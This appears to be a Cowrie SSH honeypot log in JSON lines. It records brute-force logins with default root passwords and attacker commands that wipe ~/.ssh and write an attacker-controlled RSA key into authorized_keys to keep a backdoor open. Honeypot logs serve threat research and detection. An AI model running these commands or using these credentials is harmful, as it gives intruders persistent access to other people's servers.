{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:58:31.151423Z","src_ip":"212.227.235.229","session":"a5a9dc49b219"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:58:32.395894Z","src_ip":"212.227.235.229","session":"a5a9dc49b219"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:32.693814Z","src_ip":"212.227.235.229","session":"7a6d97b32ff9"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:32.698000Z","src_ip":"212.227.235.229","session":"a5a9dc49b219"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":39726,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0721278ad49","protocol":"ssh","message":"New connection: 134.199.174.250:39726 (1.2.3.4:22) [session: b0721278ad49]","sensor":"my-vps","timestamp":"2025-09-08T12:58:40.345819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:58:40.346449Z","src_ip":"134.199.174.250","session":"b0721278ad49"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:58:40.645254Z","src_ip":"134.199.174.250","session":"b0721278ad49"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234567890","message":"login attempt [test/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T12:58:41.650649Z","src_ip":"134.199.174.250","session":"b0721278ad49"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:42.952832Z","src_ip":"134.199.174.250","session":"b0721278ad49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39364,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbf4021217f5","protocol":"ssh","message":"New connection: 212.227.235.229:39364 (1.2.3.4:22) [session: dbf4021217f5]","sensor":"my-vps","timestamp":"2025-09-08T12:58:43.294539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:58:43.295551Z","src_ip":"212.227.235.229","session":"dbf4021217f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:58:43.454374Z","src_ip":"212.227.235.229","session":"dbf4021217f5"}
{"eventid":"cowrie.login.success","username":"root","password":"calvin","message":"login attempt [root/calvin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:58:44.102809Z","src_ip":"212.227.235.229","session":"dbf4021217f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:58:44.442144Z","src_ip":"212.227.235.229","session":"dbf4021217f5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:58:44.442961Z","src_ip":"212.227.235.229","session":"dbf4021217f5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:58:44.444332Z","src_ip":"212.227.235.229","session":"dbf4021217f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:44.612944Z","src_ip":"212.227.235.229","session":"dbf4021217f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:58:45.043542Z","src_ip":"212.227.235.229","session":"dbf4021217f5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:58:45.044255Z","src_ip":"212.227.235.229","session":"dbf4021217f5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:58:45.206134Z","src_ip":"212.227.235.229","session":"dbf4021217f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:45.207101Z","src_ip":"212.227.235.229","session":"dbf4021217f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39370,"dst_ip":"1.2.3.4","dst_port":22,"session":"937dd158ff1b","protocol":"ssh","message":"New connection: 212.227.235.229:39370 (1.2.3.4:22) [session: 937dd158ff1b]","sensor":"my-vps","timestamp":"2025-09-08T12:58:45.366136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:58:45.379326Z","src_ip":"212.227.235.229","session":"937dd158ff1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:58:45.538258Z","src_ip":"212.227.235.229","session":"937dd158ff1b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:58:46.186775Z","src_ip":"212.227.235.229","session":"937dd158ff1b"}
{"eventid":"cowrie.session.closed","duration":30.38811683654785,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:46.891384Z","src_ip":"212.227.125.160","session":"58e495cf1d44"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:47.350196Z","src_ip":"212.227.235.229","session":"937dd158ff1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39374,"dst_ip":"1.2.3.4","dst_port":22,"session":"700b897afbf0","protocol":"ssh","message":"New connection: 212.227.235.229:39374 (1.2.3.4:22) [session: 700b897afbf0]","sensor":"my-vps","timestamp":"2025-09-08T12:58:47.513452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:58:47.520901Z","src_ip":"212.227.235.229","session":"700b897afbf0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:58:47.679338Z","src_ip":"212.227.235.229","session":"700b897afbf0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:58:48.313730Z","src_ip":"212.227.235.229","session":"700b897afbf0"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:48.473975Z","src_ip":"212.227.235.229","session":"dbf4021217f5"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:48.474910Z","src_ip":"212.227.235.229","session":"700b897afbf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33742,"dst_ip":"1.2.3.4","dst_port":23,"session":"eeca82c8a696","protocol":"telnet","message":"New connection: 212.227.235.229:33742 (1.2.3.4:23) [session: eeca82c8a696]","sensor":"my-vps","timestamp":"2025-09-08T12:58:50.806947Z"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":42176,"dst_ip":"1.2.3.4","dst_port":22,"session":"291fbe9253bc","protocol":"ssh","message":"New connection: 139.59.14.27:42176 (1.2.3.4:22) [session: 291fbe9253bc]","sensor":"my-vps","timestamp":"2025-09-08T12:58:55.801952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:58:55.802655Z","src_ip":"139.59.14.27","session":"291fbe9253bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:58:56.168802Z","src_ip":"139.59.14.27","session":"291fbe9253bc"}
{"eventid":"cowrie.login.success","username":"root","password":"centos_123","message":"login attempt [root/centos_123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:58:57.752715Z","src_ip":"139.59.14.27","session":"291fbe9253bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:58:58.593944Z","src_ip":"139.59.14.27","session":"291fbe9253bc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:58:58.594707Z","src_ip":"139.59.14.27","session":"291fbe9253bc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:58:58.595711Z","src_ip":"139.59.14.27","session":"291fbe9253bc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:58:58.968394Z","src_ip":"139.59.14.27","session":"291fbe9253bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:58:59.733451Z","src_ip":"139.59.14.27","session":"291fbe9253bc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:58:59.734113Z","src_ip":"139.59.14.27","session":"291fbe9253bc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:59:00.133269Z","src_ip":"139.59.14.27","session":"291fbe9253bc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:00.134120Z","src_ip":"139.59.14.27","session":"291fbe9253bc"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":42180,"dst_ip":"1.2.3.4","dst_port":22,"session":"376a4e387930","protocol":"ssh","message":"New connection: 139.59.14.27:42180 (1.2.3.4:22) [session: 376a4e387930]","sensor":"my-vps","timestamp":"2025-09-08T12:59:00.464282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:59:00.465297Z","src_ip":"139.59.14.27","session":"376a4e387930"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:59:00.816378Z","src_ip":"139.59.14.27","session":"376a4e387930"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:59:02.226704Z","src_ip":"139.59.14.27","session":"376a4e387930"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:03.560574Z","src_ip":"139.59.14.27","session":"376a4e387930"}
{"eventid":"cowrie.session.closed","duration":12.809955835342407,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:59:03.616830Z","src_ip":"212.227.235.229","session":"eeca82c8a696"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":59064,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0b4ce62ec33","protocol":"ssh","message":"New connection: 139.59.14.27:59064 (1.2.3.4:22) [session: b0b4ce62ec33]","sensor":"my-vps","timestamp":"2025-09-08T12:59:03.914912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:59:03.915575Z","src_ip":"139.59.14.27","session":"b0b4ce62ec33"}
